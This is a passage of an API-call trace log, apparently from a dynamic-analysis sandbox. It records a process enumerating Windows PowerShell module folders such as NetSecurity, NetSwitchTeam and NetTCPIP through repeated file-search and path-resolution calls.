cFileName="NetIPsecPhase1AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.177] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase2AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.177] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPolicyChange.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.177] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e77, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.177] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.177] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x994b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.178] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20fee, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.formats.ps1xml", cAlternateFileName="")) returned 1 [0265.178] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.psd1", cAlternateFileName="")) returned 1 [0265.178] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 1 [0265.178] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 0 [0265.178] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.179] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1")) returned 0x20 [0265.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.179] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0265.179] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", lpFilePart=0x0) returned 0x41 [0265.179] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.179] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.179] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.cdxml", cAlternateFileName="")) returned 1 [0265.180] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0265.180] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.cdxml", cAlternateFileName="")) returned 1 [0265.180] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd34, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0265.180] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 1 [0265.180] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 0 [0265.181] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0265.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.181] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0265.181] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", lpFilePart=0x0) returned 0x41 [0265.181] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.181] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.181] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.cdxml", cAlternateFileName="")) returned 1 [0265.181] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0265.182] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.cdxml", cAlternateFileName="")) returned 1 [0265.182] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd34, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0265.182] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 1 [0265.182] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.182] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.183] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0265.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.183] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.183] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0265.183] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", lpFilePart=0x0) returned 0x41 [0265.183] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.183] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.183] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.cdxml", cAlternateFileName="")) returned 1 [0265.184] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0265.184] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.cdxml", cAlternateFileName="")) returned 1 [0265.184] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd34, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0265.184] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 1 [0265.184] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 0 [0265.184] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.185] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1")) returned 0x20 [0265.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.185] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0265.185] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\", lpFilePart=0x0) returned 0x3c [0265.185] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.185] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.186] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetCompartment.cdxml", cAlternateFileName="")) returned 1 [0265.186] FindNextFileW (in: hFindFile=0x1a8dafc0, 